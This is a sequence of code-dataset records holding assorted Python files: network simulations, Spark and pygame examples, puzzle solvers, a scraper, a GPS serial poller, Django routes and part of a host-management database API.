\"Auburn71\", \"BC17\", \"BU10\",\n\"Baylor93\", \"Berkeley13\", \"Bingham82\", \"Bowdoin47\",\n\"Brandeis99\", \"Brown11\", \"Bucknell39\", \"Cal65\", \"Caltech36\",\n\"Carnegie49\", \"Colgate88\", \"Columbia2\", \"Cornell5\",\n\"Dartmouth6\", \"Duke14\", \"Emory27\", \"FSU53\", \"GWU54\",\n\"Georgetown15\", \"Hamilton46\", \"Harvard1\", \"Haverford76\",\n\"Howard90\", \"Indiana69\", \"JMU79\", \"Johns Hopkins55\",\n\"Lehigh96\", \"MIT8\", \"MSU24\", \"MU78\", \"Maine59\",\n\"Maryland58\", \"Mich67\", \"Michigan23\", \"Middlebury45\",\n\"Mississippi66\", \"NYU9\", \"Northeastern19\", \"Northwestern25\",\n\"Notre Dame57\", \"Oberlin44\", \"Oklahoma97\", \"Penn94\",\n\"Pepperdine86\", \"Princeton12\", \"Reed98\", \"Rice31\",\n\"Rochester38\", \"Rutgers89\", \"Santa74\", \"Simmons81\",\n\"Smith60\", \"Stanford3\", 
\"Swarthmore42\", \"Syracuse56\",\n\"Temple83\", \"Tennessee95\", \"Texas80\", \"Texas84\",\n\"Trinity100\", \"Tufts18\", \"Tulane29\", \"UC33\", \"UC61\", \"UC64\",\n\"UCF52\", \"UCLA26\", \"UCSB37\", \"UCSC68\", \"UCSD34\",\n\"UChicago30\", \"UConn91\", \"UF21\", \"UGA50\", \"UIllinois20\",\n\"UMass92\", \"UNC28\", \"UPenn7\", \"USC35\", \"USF51\", \"USFCA72\",\n\"UVA16\", \"Vanderbilt48\", \"Vassar85\", \"Vermont70\",\n\"Villanova62\", \"Virginia63\", \"Wake73\", \"WashU32\",\n\"Wellesley22\", \"Wesleyan43\", \"William77\", \"Williams40\",\n\"Wisconsin87\", \"Yale4\"\n]\n\n\n#rds_iter should yield named networks\ndef rdsim_iter(network_names, sim_params):\n # parameter function definitions \n for net_name in network_names:\n net_path = os.path.normpath(\"R:/RDS/facebook_data/graphml_gc/{}_gc.graphml\".format(net_name))\n G =nx.read_graphml(net_path)\n \n for nname in G.nodes():\n G.node[nname] = {k:int(v) for k,v in G.node[nname].items()}\n \n # Trim network as appropriate\n G.remove_nodes_from([i for i in G.nodes() if G.node[i]['student']!=1])\n G.remove_nodes_from([\n i for i in G.nodes() \n if G.node[i]['year'] > 2009 or G.node[i]['year'] < 2006\n ])\n G = G.to_undirected()\n G = max(nx.connected_component_subgraphs(G), key=len)\n G.name = net_name\n \n # Assign nodes\n for node in G.nodes():\n G.node[node]['fresh'] = str(int(G.node[node]['year']==2009))\n G.node[node]['sophmore'] = str(int(G.node[node]['year']==2008))\n G.node[node]['junior'] = str(int(G.node[node]['year']==2007))\n G.node[node]['senior'] = str(int(G.node[node]['year']==2006))\n \n # RDNet may scramble node id numbers\n base_net = rds.RDNet(\n network=G,\n attLevels=sim_params['att_levels'],\n att_pairs=['fresh', 'sophmore', 'junior', 'senior']\n )\n \n cur_sim = rds.RDSim(\n RDNet=base_net, \n seeds=10, \n reclimit=base_net.network.order(), \n rec=sim_params['rec_activity_method'], \n rec_params=sim_params['rec_parameters'], \n rec_meth=sim_params['rec_method'],\n rec_meth_params=sim_params['rec_method_params']\n )\n \n base_net.clear()\n G.clear()\n\n cur_sim.reID()\n yield cur_sim\n\n# Create a generator to yield configured rdsim objects \nsims = rdsim_iter(networks, sim_params )\n\n#No Char or newlines past here","sub_path":"RDS/code/options_files/facebook/by_grade/fb_100_diffRec_1.1-1.1_s500.py","file_name":"fb_100_diffRec_1.1-1.1_s500.py","file_ext":"py","file_size_in_byte":4261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"37131970","text":"from pyspark import SparkContext, SparkConf\n\nsc = SparkContext.getOrCreate(SparkConf())\n\n# Parse the line and form key-value pair like (age, friend count)\ndef parse_line(line):\n fields = line.split(',')\n age = int(fields[2])\n friends_count = int(fields[3])\n\n return (age, friends_count)\n\n# readin the csv\nlines = sc.textFile('../dataset/fakefriends.csv')\nrdd = lines.map(parse_line)\n\n# generate key-value pair for averaging later (age, (friend count, 1))\nrdd2 = rdd.mapValues(lambda x: (x,1))\n\n# generate the key-value pair (age, (total friend, total count))\ntotal_by_age = rdd2.reduceByKey(lambda x,y: (x[0]+y[0], x[1]+y[1]))\n\n# calculate the average of the fiend count\naverage_friend_count = total_by_age.mapValues(lambda x: x[0]/x[1])\naverage_friend_count_sorted = average_friend_count.sortByKey()\n\nresults = average_friend_count_sorted.collect()\n\nfor result in results:\n 
print(result)\n\n","sub_path":"2_spark_basics_and_simple_examples/friends_by_age.py","file_name":"friends_by_age.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"404519841","text":"import math\n\ndef gcd(a, b):\n if a == 0:\n return b\n return (gcd(b%a, a))\n\n# Do not use this, fucking recursion\ndef phi(n):\n result = 1\n for i in range(2, n):\n if gcd(i, n) == 1:\n result += 1\n\n return result\n\ndef prime_factor(n):\n prime_factors = []\n while n % 2 == 0:\n prime_factors.append(2)\n n = n / 2\n\n for i in range(3, int(math.sqrt(n))+1,2):\n while n % i == 0:\n prime_factors.append(i)\n n = n / i\n\n if n > 2:\n prime_factors.append(n)\n\n return list(set(prime_factors))\n\n# Use this to get euler's totient\ndef euler_product(n):\n prime_factors = prime_factor(n)\n\n product = 1\n\n for p in prime_factors:\n product *= (1 - 1/p)\n\n return int(n*product)\n\nprint(euler_product(15104097))\n","sub_path":"euler_totient.py","file_name":"euler_totient.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"26192403","text":"import pygame\r\n\r\npygame.init()\r\n\r\nWHITE = (255, 255, 255)\r\nBLACK = (0, 0, 0)\r\nRED = (255, 0, 0)\r\nGREEN = (0, 255, 0)\r\nBLUE = (0, 0, 255)\r\n\r\nwindow_size = 640, 480\r\nwindow = pygame.display.set_mode(window_size)\r\nwindow.fill(BLUE)\r\n\r\npygame.display.set_caption('Intro to Game Programming')\r\n\r\nx_position = 0\r\n# since we're going to move the red rectangle in two dimensions we a variable for the y coordinate\r\ny_position = 0\r\n\r\nrunning = True\r\n\r\nwhile running:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n running = False\r\n if event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE:\r\n running = False\r\n\r\n # Each time the game loop runs the value in both position variables is increased.\r\n # This now \"moves\" the red rect to the right and down at the same time.\r\n x_position += 0.1\r\n y_position += 0.1\r\n\r\n # now instead of previous hard coding use y_position for the y coordinate\r\n pygame.draw.rect(window, RED, pygame.Rect(x_position, y_position, 60, 60))\r\n pygame.display.update()\r\n\r\n window.fill(BLUE)\r\n\r\npygame.quit()","sub_path":"Python/FORR2HF05CU/Lokaverkefni/Sýniverkefni/01_PyGame/07_pygame.py","file_name":"07_pygame.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"296921096","text":"import math\n\n\ndef find_trees(course, x_move, y_move):\n course_height = len(course)\n course_width = len(course[0])\n\n x = 0\n trees = 0\n for y in range(0, course_height, y_move):\n if course[y][x % course_width] == \"#\":\n trees += 1\n x += x_move\n\n return trees\n\n\ndef solution(input_string):\n course = [list(line) for line in input_string.split(\"\\n\")]\n\n slopes = (\n (1, 1),\n (3, 1),\n (5, 1),\n (7, 1),\n (1, 2),\n )\n\n return math.prod(map(lambda i: find_trees(course, *i), slopes))\n\n\nif __name__ == \"__main__\":\n with open(\"input.txt\") as f:\n print(solution(f.read().strip()))\n","sub_path":"src/adventofcode/year2020/day5/problem2.py","file_name":"problem2.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"454184656","text":"#!/usr/bin/env python\n\n\"\"\"\n.. 
module:: convert\n :synopsis: used to create info.txt and the .txt files.\n\n\"\"\"\nimport sys\nimport os\nimport argparse\n\nargparser = argparse.ArgumentParser(description = \n'create info.txt, txname.txt, twiki.txt and sms.py')\nargparser.add_argument ('-utilsPath', '--utilsPath', \nhelp = 'path to the package smodels_utils',\\\ntype = str )\nargparser.add_argument ('-smodelsPath', '--smodelsPath', \nhelp = 'path to the package smodels_utils',\\\ntype = str )\nargs = argparser.parse_args()\n\nif args.utilsPath:\n utilsPath = args.utilsPath\nelse:\n databaseRoot = '../../../'\n sys.path.append(os.path.abspath(databaseRoot))\n from utilsPath import utilsPath\n utilsPath = databaseRoot + utilsPath\nif args.smodelsPath:\n sys.path.append(os.path.abspath(args.smodelsPath))\n\nsys.path.append(os.path.abspath(utilsPath))\nfrom smodels_utils.dataPreparation.inputObjects import MetaInfoInput,DataSetInput\nfrom smodels_utils.dataPreparation.databaseCreation import databaseCreator\nfrom smodels_utils.dataPreparation.massPlaneObjects import x, y, z\n\n\n\n#+++++++ global info block ++++++++++++++\ninfo = MetaInfoInput('ATLAS-CONF-2013-025')\ninfo.sqrts = '8.0'\ninfo.private = False\ninfo.lumi = '20.7'\ninfo.url = 'https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/CONFNOTES/ATLAS-CONF-2013-025/'\ninfo.supersededBy = 'ATLAS-SUSY-2013-08' \ninfo.prettyName = '>= 5 (>=1 b-) jets + 2,3 SF OS leptons + Etmiss'\n\n\n#+++++++ dataset block ++++++++++++++\ndataset = DataSetInput('data')\ndataset.setInfo(dataType = 'upperLimit', dataId = None)\n\n#+++++++ next txName block ++++++++++++++\nT6ZZtt = dataset.addTxName('T6ZZtt')\nT6ZZtt.checked =\"AL\"\nT6ZZtt.constraint =\"[[['Z'],['t']],[['Z'],['t']]]\"\nT6ZZtt.conditionDescription =\"None\"\nT6ZZtt.condition =\"None\"\nT6ZZtt.source = \"ATLAS\"\n#+++++++ next mass plane block ++++++++++++++\nT6ZZttD180 = T6ZZtt.addMassPlane(2*[[x, y+180.0, y]])\nT6ZZttD180.figure = 'Figure 10'\nT6ZZttD180.figureUrl ='https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/CONFNOTES/ATLAS-CONF-2013-025/figaux_10.png'\nT6ZZttD180.dataUrl = 'Not defined'\nT6ZZttD180.setSources(dataLabels= ['obsExclusion', 'obsExclusionM1', 'obsExclusionP1', 'upperLimits'],\n dataFiles= ['orig/exclusion_T6ZZttD180.txt', 'orig/exclusionm1_T6ZZttD180.txt', 'orig/exclusionp1_T6ZZttD180.txt', 'orig/T6ZZttD180.txt'],\n dataFormats= ['svg', 'svg', 'svg', 'txt'],units= [None, None, None, 'fb'])\n\n\n\ndatabaseCreator.create()\n","sub_path":"smodels-database/8TeV/ATLAS/ATLAS-CONF-2013-025/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"217071036","text":"from bs4 import BeautifulSoup\nfrom Bible import Bible\nimport requests\nimport urllib\nimport os\nimport string\n\nclass Book:\n def getInfo(self, url, abbr):\n ## Get Chapter\n chapter = ''.join(i for i in url[-3:] if i.isdigit())\n\n ## Access web site\n url = urllib.request.Request(url,headers={'User-Agent': 'Mozilla/5.0'}) \n content = urllib.request.urlopen(url).read()\n soup = BeautifulSoup(content, 'html.parser')\n\n ## Get verses Text\n verseBody = soup.find('article').find('div').find('div')\n verseRaw = verseBody.find_all('p')\n\n try:\n copyRight = verseBody.find('p', attrs={\"class\":\"MuiTypography-body2\"})\n except:\n copyRight = None\n\n if copyRight:\n verseRaw.pop()\n\n for i in range(0, len(verseRaw)):\n unwantedTag = verseRaw[i].find('sup')\n unwantedTag.extract()\n\n verse = []\n for i in range(0, 
len(verseRaw)):\n single_quote = \"'\"\n double_quote = '\"'\n verse.append(verseRaw[i].text.lstrip().replace(double_quote, single_quote))\n \n return verse","sub_path":"make_database/Book.py","file_name":"Book.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"570528357","text":"#!/usr/bin/python\n# Copyright (C) 2016 Berkeley Applied Analytics \n# Copyright (C) 2010 Timo Juhani Lindfors \n\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\nimport ubx\nimport struct\nimport calendar\nimport os\nimport gobject\nimport logging\nimport sys\nimport socket\nimport time\nimport signal\n\nd = {}\nstart = time.time()\nTIMEOUT = 20\nloop = gobject.MainLoop()\nstate = 0\n\ndef signal_handler(signal, frame):\n loop.quit()\n\nsignal.signal(signal.SIGINT, signal_handler)\nsignal.signal(signal.SIGHUP, signal_handler)\n\ndef timeout(*args):\n print(\"timeout\")\n loop.quit()\n\ndef poll_nav_status(*args):\n #print(\"poll_nav_status\")\n t.sendraw((\"\\xff\" * 8) + \"\\xB5\\x62\\x02\\x40\\x00\\x00\\x42\\xC8\")\n t.send(\"NAV-STATUS\", 0, [])\n\ndef poll_nav_posllh(*args):\n #print(\"poll_nav_status\")\n t.sendraw((\"\\xff\" * 8) + \"\\xB5\\x62\\x02\\x40\\x00\\x00\\x42\\xC8\")\n t.send(\"NAV-POSLLH\", 0, [])\n \ndef callback(ty, *args):\n global state\n global d\n \n print(\"callback %s %s\" % (ty, repr(args)))\n d[ty] = args\n if ty == \"NAV-STATUS\":\n if d[\"NAV-STATUS\"][0][0][\"GPSfix\"] != 0:\n #print(\"fix acquired\")\n state = 1\n poll_nav_posllh()\n else:\n #print(\"poll scheduled\")\n gobject.timeout_add(1000, poll_nav_status)\n elif state == 1 and ty == \"NAV-POSLLH\":\n print(\"%s %s %s %s %s %s\" %\n (d[\"NAV-STATUS\"][0][0][\"GPSfix\"],\n d[\"NAV-STATUS\"][0][0][\"TTFF\"] * 10**-3,\n int(time.time() - start),\n d[\"NAV-POSLLH\"][0][0][\"LAT\"] * 10**-7,\n d[\"NAV-POSLLH\"][0][0][\"LON\"] * 10**-7,\n d[\"NAV-POSLLH\"][0][0][\"Hacc\"] * 10**-3))\n \n #print(\"done\")\n loop.quit()\n\nif __name__ == \"__main__\":\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('--device', '-d', help='Specify the serial port device to communicate with. e.g. /dev/ttyO5')\n args = parser.parse_args()\n\n if args.device is not None:\n t = ubx.Parser(callback, device=args.device)\n else:\n t = ubx.Parser(callback)\n print('Polling NAV-STATUS... 
press CTRL-C to stop')\n poll_nav_status()\n # gobject.timeout_add(TIMEOUT * 1000, timeout)\n loop.run()\n","sub_path":"ask-position.py","file_name":"ask-position.py","file_ext":"py","file_size_in_byte":3302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"138611359","text":"#bin/python3\n\nimport sys\n\n\ndef count_transpositions(p, c):\n\n if len(p) <= 1:\n return p, c\n\n min_v = min(p)\n min_vi = p.index(min_v)\n\n if p[0] != min_v:\n # swap\n tmp = p[0]\n p[0] = min_v\n p[min_vi] = tmp\n c += 1\n\n res, c = count_transpositions(p[1:], c)\n\n return [min_v] + res, c\n\n\n# swap tile a and b\ndef swap_tiles(p, a, b):\n pass\n\n\ndef find_solution(p):\n # check if all elements are on their right places (it is enough to check N - 1 elements)\n for i in range(len(p) - 1):\n # houston, we have a problem... hostile element spotted\n if p[i] != i + 1:\n correct_element_i = p.index(i + 1)\n new_p = move_element(p, correct_element_i, i)\n\n\ndef change_empty_space(p, a):\n if a:\n p[p.index(0)] = 16\n else:\n p[p.index(16)] = 0\n\n return p \n\n\nif __name__ == \"__main__\":\n config = input()\n config = config.split(\",\") if \",\" in config else config.split()\n init_perm = list(map(int, config))\n perm = change_empty_space(init_perm.copy(), True)\n\n # check if initial permutation has solution or not\n # N of transpositions should be even\n res, c = count_transpositions(perm, 0)\n \n try:\n assert c % 2 == 0\n \n except AssertionError:\n sys.exit(\"N of transpositions is odd. Perm does not have a solution\")\n\n print(change_empty_space(res, False), c)\n\n","sub_path":"math_thinking/15puzzle.py","file_name":"15puzzle.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"264335125","text":"from graph.sparse_graph import SparseGraph\nfrom graph.dense_graph import DenseGraph\nfrom graph.sparse_graph import SparseGraphAdjIterator\nfrom graph.dense_graph import DenseGraphAdjIterator\nclass Path:\n def __init__(self, graph, s):\n self.G = graph\n self.froms = [-1 for i in range(self.G.V()) ]\n self.visited = [False for i in range(self.G.V())]\n self._dfs(s)\n def _dfs(self, v):\n self.visited[v] = True\n adjIterator = None\n if isinstance(self.G, SparseGraph):\n adjIterator = SparseGraphAdjIterator(self.G, v)\n elif isinstance(self.G, DenseGraph):\n adjIterator = DenseGraphAdjIterator(self.G, v)\n\n a = adjIterator.begin()\n while not adjIterator.end():\n if not self.visited[a]:\n self.froms[a] = v\n self._dfs(a)\n a = adjIterator.next()\n\n def has_path(self, v):\n assert v >= 0 and v < self.G.V(), \\\n \"v must be valid entry voint\"\n return self.visited[v]\n def path(self, v, vec):\n s = []\n p = v\n while p != -1:\n s.append(p)\n p = self.froms[p]\n\n vec = []\n while len(s) != 0:\n vec.append(s.pop(-1))\n\n return vec\n def show_path(self, v):\n assert v >= 0 and v < self.G.V(), \\\n \"v must be valid entry voint\"\n vec = []\n vec = self.path(v, vec)\n string = \"\"\n for i in range(len(vec)):\n string += str(vec[i])\n if i == len(vec) - 1:\n string += '\\n'\n else:\n string += \" -> \"\n print(string)","sub_path":"graph/path.py","file_name":"path.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"274658440","text":"from django.urls import path\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom . 
import views\n\napp_name = 'articulos'\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('preguntas/', views.detail, name='detail'),\n path('CrearPregunta//', views.ArticuloFormA, name='ArticuloFormA'),\n path('/results/', views.results, name='results'),\n path('/results/', views.resultsH, name='resultsH'),\n\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"Openschool/articulos/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"631196187","text":"import turtle\r\nimport winsound \r\n\r\nwn=turtle.Screen()\r\nwn.title(\"Pratya's game\")\r\nwn.bgcolor(\"black\")\r\nwn.setup(width=800 ,height=600)\r\nwn.tracer(0)\r\n\r\n#paddle a\r\npaddle_a=turtle.Turtle()\r\npaddle_a.speed(0)\r\npaddle_a.shape(\"square\")\r\npaddle_a.color(\"white\")\r\npaddle_a.shapesize(stretch_wid=5,stretch_len=1)\r\npaddle_a.penup()\r\npaddle_a.goto(-350,0)\r\n\r\n\r\n\r\n#paddle b\r\npaddle_b=turtle.Turtle()\r\npaddle_b.speed(0)\r\npaddle_b.shape(\"square\")\r\npaddle_b.color(\"white\")\r\npaddle_b.shapesize(stretch_wid=5,stretch_len=1)\r\npaddle_b.penup()\r\npaddle_b.goto(350,0)\r\n\r\n#ball\r\nball=turtle.Turtle()\r\nball.speed(0)\r\nball.shape(\"square\")\r\nball.color(\"white\")\r\nball.penup()\r\nball.goto(0,0)\r\nball.dx=0.4\r\nball.dy=-0.4\r\n\r\n#score\r\nscore_a=0\r\nscore_b=0\r\n\r\n#scoreboard\r\npen=turtle.Turtle()\r\npen.speed(0)\r\npen.color(\"white\")\r\npen.penup()\r\npen.hideturtle()\r\npen.goto(0,260)\r\npen.write(\"Player A: 0 Player B: 0 \", align=\"center\",font=(\"Courier\",12,\"normal\"))\r\n\r\n#result\r\nwinner=turtle.Turtle()\r\nwinner.speed(0)\r\nwinner.color(\"blue\")\r\nwinner.penup()\r\nwinner.goto(0,0)\r\nwinner.hideturtle()\r\n\r\n\r\n#movement\r\n\r\ndef paddle_a_up():\r\n\ty=paddle_a.ycor()\r\n\ty+=20\r\n\tpaddle_a.sety(y)\r\n\r\ndef paddle_a_down():\r\n\ty=paddle_a.ycor()\r\n\ty-=20\r\n\tpaddle_a.sety(y)\r\n\r\n\r\ndef paddle_b_up():\r\n\ty=paddle_b.ycor()\r\n\ty+=20\r\n\tpaddle_b.sety(y)\r\n\r\ndef paddle_b_down():\r\n\ty=paddle_b.ycor()\r\n\ty-=20\r\n\tpaddle_b.sety(y)\r\n\r\n#keyboard binding\r\nwn.listen()\r\nwn.onkeypress(paddle_a_up,\"w\")\r\nwn.onkeypress(paddle_a_down,\"s\")\r\nwn.onkeypress(paddle_b_up,\"Up\")\r\nwn.onkeypress(paddle_b_down,\"Down\")\r\n\r\n#main loop\r\nwhile True:\r\n\twn.update()\r\n\r\n\t#move the ball\r\n\tball.setx(ball.xcor() + ball.dx)\r\n\tball.sety(ball.ycor()+ ball.dy)\r\n\r\n\t#border check\r\n\tif ball.ycor()>290 :\r\n\t\tball.sety(290)\r\n\t\tball.dy*= -1\r\n\t\t\r\n\t\t\r\n\tif ball.ycor()<-290 :\r\n\t\tball.sety(-290)\r\n\t\tball.dy*= -1\r\n\t\t\r\n\r\n #miss collision and score update\r\n\tif ball.xcor()>350:\r\n\t\tball.goto(0,0)\r\n\t\tball.dx*=-1\r\n\t\tscore_a+=1\t\r\n\t\tpen.clear()\r\n\t\tpen.write(\"Player A: {} Player B: {} \".format(score_a,score_b), align=\"center\",font=(\"Courier\",12,\"normal\"))\r\n\r\n\tif ball.xcor()<-350:\r\n\t\tball.goto(0,0)\r\n\t\tball.dx*=-1\r\n\t\tscore_b+=1\r\n\t\tpen.clear()\t\r\n\t\tpen.write(\"Player A: {} Player B: {} \".format(score_a,score_b), align=\"center\",font=(\"Courier\",12,\"normal\"))\t\r\n\r\n\t\r\n\t#check collision\t\r\n\tif ball.xcor()>330 :\r\n\t\tif ball.ycor() int:\n idx = -1\n for i in range(len(nums)):\n if nums[i] > target:\n return 0\n if nums[i] == target:\n idx = i\n break\n if idx == -1:\n 
return 0\n for i in range(idx+1, len(nums)):\n if nums[i] != target:\n return i - idx\n return len(nums)-idx\n\n\nif __name__ == '__main__':\n print(Solution().search([5,7,7,8,8,10], 8))\n print(Solution().search([5,7,7,8,8,10], 6))","sub_path":"answers/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"364887802","text":"# Copyright 2014 Huawei Technologies Co. Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Host database operations.\"\"\"\nimport functools\nimport logging\nimport netaddr\n\nfrom compass.db.api import database\nfrom compass.db.api import metadata_holder as metadata_api\nfrom compass.db.api import permission\nfrom compass.db.api import user as user_api\nfrom compass.db.api import utils\nfrom compass.db import exception\nfrom compass.db import models\n\n\nSUPPORTED_FIELDS = ['name', 'os_name', 'owner', 'mac']\nSUPPORTED_MACHINE_HOST_FIELDS = ['mac', 'tag', 'location', 'os_name', 'os_id']\nSUPPORTED_NETOWORK_FIELDS = [\n 'interface', 'ip', 'is_mgmt', 'is_promiscuous'\n]\nRESP_FIELDS = [\n 'id', 'name', 'hostname', 'os_name', 'os_id', 'owner', 'mac',\n 'switch_ip', 'port', 'switches', 'os_installer', 'ip',\n 'reinstall_os', 'os_installed', 'tag', 'location', 'networks',\n 'created_at', 'updated_at'\n]\nRESP_CLUSTER_FIELDS = [\n 'id', 'name', 'os_name', 'reinstall_distributed_system',\n 'distributed_system_name', 'owner', 'adapter_id',\n 'distributed_system_installed',\n 'adapter_id', 'created_at', 'updated_at'\n]\nRESP_NETWORK_FIELDS = [\n 'id', 'ip', 'interface', 'netmask', 'is_mgmt', 'is_promiscuous',\n 'created_at', 'updated_at'\n]\nRESP_CONFIG_FIELDS = [\n 'os_config',\n 'config_setp',\n 'config_validated',\n 'networks',\n 'created_at',\n 'updated_at'\n]\nRESP_DEPLOYED_CONFIG_FIELDS = [\n 'deployed_os_config'\n]\nRESP_DEPLOY_FIELDS = [\n 'status', 'host'\n]\nUPDATED_FIELDS = ['host_id', 'name', 'reinstall_os']\nUPDATED_CONFIG_FIELDS = [\n 'put_os_config'\n]\nPATCHED_CONFIG_FIELDS = [\n 'patched_os_config'\n]\nUPDATED_DEPLOYED_CONFIG_FIELDS = [\n 'deployed_os_config'\n]\nADDED_NETWORK_FIELDS = [\n 'interface', 'ip', 'subnet_id'\n]\nOPTIONAL_ADDED_NETWORK_FIELDS = ['is_mgmt', 'is_promiscuous']\nUPDATED_NETWORK_FIELDS = [\n 'interface', 'ip', 'subnet_id', 'subnet', 'is_mgmt',\n 'is_promiscuous'\n]\nIGNORE_FIELDS = [\n 'id', 'created_at', 'updated_at'\n]\nRESP_STATE_FIELDS = [\n 'id', 'state', 'percentage', 'message', 'severity', 'ready'\n]\nUPDATED_STATE_FIELDS = [\n 'state', 'percentage', 'message', 'severity'\n]\nUPDATED_STATE_INTERNAL_FIELDS = [\n 'ready'\n]\nRESP_LOG_FIELDS = [\n 'id', 'filename', 'position', 'partial_line', 'percentage',\n 'message', 'severity', 'line_matcher_name'\n]\nADDED_LOG_FIELDS = [\n 'filename'\n]\nUPDATED_LOG_FIELDS = [\n 'position', 'partial_line', 'percentage',\n 'message', 'severity', 
'line_matcher_name'\n]\n\n\n@utils.supported_filters(optional_support_keys=SUPPORTED_FIELDS)\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_LIST_HOSTS\n)\n@utils.wrap_to_dict(RESP_FIELDS)\ndef list_hosts(user=None, session=None, **filters):\n \"\"\"List hosts.\"\"\"\n return utils.list_db_objects(\n session, models.Host, **filters\n )\n\n\n@utils.supported_filters(\n optional_support_keys=SUPPORTED_MACHINE_HOST_FIELDS)\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_LIST_HOSTS\n)\n@utils.output_filters(\n missing_ok=True,\n tag=utils.general_filter_callback,\n location=utils.general_filter_callback,\n os_name=utils.general_filter_callback,\n os_id=utils.general_filter_callback\n)\n@utils.wrap_to_dict(RESP_FIELDS)\ndef list_machines_or_hosts(user=None, session=None, **filters):\n \"\"\"List hosts.\"\"\"\n machines = utils.list_db_objects(\n session, models.Machine, **filters\n )\n machines_or_hosts = []\n for machine in machines:\n host = machine.host\n if host:\n machines_or_hosts.append(host)\n else:\n machines_or_hosts.append(machine)\n return machines_or_hosts\n\n\n@utils.supported_filters([])\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_LIST_HOSTS\n)\n@utils.wrap_to_dict(RESP_FIELDS)\ndef get_host(\n host_id, exception_when_missing=True,\n user=None, session=None, **kwargs\n):\n \"\"\"get host info.\"\"\"\n return utils.get_db_object(\n session, models.Host,\n exception_when_missing, id=host_id\n )\n\n\n@utils.supported_filters([])\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_LIST_HOSTS\n)\n@utils.wrap_to_dict(RESP_FIELDS)\ndef get_machine_or_host(\n host_id, exception_when_missing=True,\n user=None, session=None, **kwargs\n):\n \"\"\"get host info.\"\"\"\n machine = utils.get_db_object(\n session, models.Machine,\n exception_when_missing, id=host_id\n )\n if not machine:\n return None\n host = machine.host\n if host:\n return host\n else:\n return machine\n\n\n@utils.supported_filters([])\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_LIST_HOST_CLUSTERS\n)\n@utils.wrap_to_dict(RESP_CLUSTER_FIELDS)\ndef get_host_clusters(host_id, user=None, session=None, **kwargs):\n \"\"\"get host clusters.\"\"\"\n host = utils.get_db_object(\n session, models.Host, id=host_id\n )\n return [clusterhost.cluster for clusterhost in host.clusterhosts]\n\n\ndef _conditional_exception(host, exception_when_not_editable):\n if exception_when_not_editable:\n raise exception.Forbidden(\n 'host %s is not editable' % host.name\n )\n else:\n return False\n\n\ndef is_host_validated(session, host):\n if not host.config_validated:\n raise exception.Forbidden(\n 'host %s is not validated' % host.name\n )\n\n\ndef is_host_editable(\n session, host, user,\n reinstall_os_set=False, exception_when_not_editable=True\n):\n if reinstall_os_set:\n if 